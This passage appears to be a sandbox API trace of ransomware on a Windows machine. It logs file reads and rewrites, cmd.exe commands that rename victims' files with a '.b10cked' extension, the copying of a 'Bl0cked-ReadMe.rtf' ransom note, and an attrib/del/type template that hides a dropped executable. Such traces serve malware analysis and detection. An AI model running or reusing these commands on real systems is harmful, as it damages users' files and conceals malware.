lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0193.448] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0193.448] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xc038 [0193.448] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0193.448] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0193.448] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xc038 [0193.448] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0193.448] SetFilePointer (in: hFile=0x120, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0xbb50 [0193.448] ReadFile (in: hFile=0x120, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0193.449] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0193.449] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0193.449] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0xc038 [0193.449] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0193.449] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0193.449] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0193.450] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0xc038 [0193.450] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0193.450] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0193.450] ReadFile (in: hFile=0x120, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x601b, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x601b, lpOverlapped=0x0) returned 1 [0193.450] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0193.450] WriteFile (in: hFile=0x120, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0x601b, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0x601b, lpOverlapped=0x0) returned 1 [0193.450] SetFilePointer (in: hFile=0x120, lDistanceToMove=-24603, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x601d [0193.450] ReadFile (in: hFile=0x120, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x601b, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x601b, lpOverlapped=0x0) returned 1 [0193.450] SetFilePointer (in: hFile=0x120, lDistanceToMove=-24603, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x601d [0193.451] WriteFile (in: hFile=0x120, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0x601b, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0x601b, lpOverlapped=0x0) returned 1 [0193.454] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="user.bmp", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0193.454] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="user.bmp", cchWideChar=8, lpMultiByteStr=0x131322c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="user.bmp", lpUsedDefaultChar=0x0) returned 8 [0193.454] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0xc038 [0193.454] WriteFile (in: hFile=0x120, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0193.454] CloseHandle (hObject=0x120) returned 1 [0193.456] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\user.bmp", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\user.bmp") returned 0x2c [0193.456] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\") returned 0x24 [0193.457] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\user.bmp\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\user.bmp.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\user.bmp\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\user.bmp.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xd40, dwThreadId=0xa64)) returned 1 [0193.458] CloseHandle (hObject=0x1b4) returned 1 [0193.458] CloseHandle (hObject=0x120) returned 1 [0193.458] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\", cchLength=0x33 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\") returned 0x33 [0193.458] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\", cchLength=0x33 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\") returned 0x33 [0193.458] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\", cchCount1=51, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\", cchCount2=51) returned 2 [0193.458] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0193.458] ReleaseMutex (hMutex=0xf8) returned 1 [0193.458] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0193.458] ReleaseMutex (hMutex=0xf8) returned 1 [0193.458] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0193.458] ReleaseMutex (hMutex=0xf8) returned 1 [0193.458] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0193.458] ReleaseMutex (hMutex=0xf8) returned 1 [0193.458] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\Hx.hxn" (normalized: "c:\\users\\all users\\microsoft help\\hx.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0193.459] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0193.459] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16e [0193.460] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0193.460] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=25024879478) returned 1 [0193.460] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0193.460] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16e [0193.460] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0193.460] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0193.460] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16e [0193.460] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0193.460] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0193.460] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x16e [0193.460] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0193.460] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0193.460] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16e [0193.460] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0193.460] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0193.460] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16e [0193.460] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0193.460] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0193.460] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16e [0193.460] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0193.460] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0193.460] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16e [0193.461] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0193.461] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0193.461] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16e [0193.461] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0193.461] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0193.461] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16e [0193.461] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0193.461] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0193.461] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x16e [0193.461] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0193.461] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0193.461] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0193.461] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x16e [0193.461] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0193.461] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0193.461] ReadFile (in: hFile=0x120, lpBuffer=0x12ea7f8, nNumberOfBytesToRead=0xb6, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x12ea7f8*, lpNumberOfBytesRead=0x12ec08*=0xb6, lpOverlapped=0x0) returned 1 [0193.462] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0193.462] WriteFile (in: hFile=0x120, lpBuffer=0x12ea7f8*, nNumberOfBytesToWrite=0xb6, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x12ea7f8*, lpNumberOfBytesWritten=0x12ec1c*=0xb6, lpOverlapped=0x0) returned 1 [0193.462] SetFilePointer (in: hFile=0x120, lDistanceToMove=-182, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xb8 [0193.463] ReadFile (in: hFile=0x120, lpBuffer=0x12ea7f8, nNumberOfBytesToRead=0xb6, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x12ea7f8*, lpNumberOfBytesRead=0x12ec08*=0xb6, lpOverlapped=0x0) returned 1 [0193.463] SetFilePointer (in: hFile=0x120, lDistanceToMove=-182, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xb8 [0193.463] WriteFile (in: hFile=0x120, lpBuffer=0x12ea7f8*, nNumberOfBytesToWrite=0xb6, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x12ea7f8*, lpNumberOfBytesWritten=0x12ec1c*=0xb6, lpOverlapped=0x0) returned 1 [0193.466] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Hx.hxn", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0193.466] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Hx.hxn", cchWideChar=6, lpMultiByteStr=0x131ab64, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Hx.hxn", lpUsedDefaultChar=0x0) returned 6 [0193.466] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x16e [0193.466] WriteFile (in: hFile=0x120, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0193.467] CloseHandle (hObject=0x120) returned 1 [0193.467] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\Hx.hxn", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\Hx.hxn") returned 0x21 [0193.468] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\") returned 0x1b [0193.468] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\Hx.hxn\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\Hx.hxn.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\Hx.hxn\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\Hx.hxn.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xe08, dwThreadId=0x728)) returned 1 [0193.528] CloseHandle (hObject=0x1b4) returned 1 [0193.528] CloseHandle (hObject=0x120) returned 1 [0193.528] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0193.528] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\", cchLength=0x33 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\") returned 0x33 [0193.528] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount1=34, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\", cchCount2=51) returned 1 [0193.528] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0193.528] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0193.528] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount1=34, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 1 [0193.528] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF") returned 0x2d [0193.528] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\"", cchLength=0x20 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\"") returned 0x20 [0193.528] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0193.528] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\") returned 0x1b [0193.529] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"[TO_PATH]\"", cchLength=0x42 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\BL0CKE~1.RTF\" > \"[TO_PATH]\"") returned 0x42 [0193.529] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0193.529] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\MICROS~2\\Bl0cked-ReadMe.rtf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb94*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb84 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\MICROS~2\\Bl0cked-ReadMe.rtf\"", lpProcessInformation=0x12fb84*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xa4c, dwThreadId=0xb54)) returned 1 [0193.533] CloseHandle (hObject=0x1b4) returned 1 [0193.533] CloseHandle (hObject=0x120) returned 1 [0193.533] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\all users\\microsoft help\\bl0cked-readme.rtf")) returned 0xffffffff [0193.533] GetLastError () returned 0x2 [0193.533] CopyFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), lpNewFileName="C:\\Users\\All Users\\Microsoft Help\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\all users\\microsoft help\\bl0cked-readme.rtf"), bFailIfExists=0) returned 1 [0193.536] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\all users\\microsoft help\\bl0cked-readme.rtf")) returned 0x2020 [0193.536] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0193.536] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft Help", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0193.536] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0193.536] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0193.536] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe") returned 0x36 [0193.536] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"[FROM_PATH]\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0x87 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & 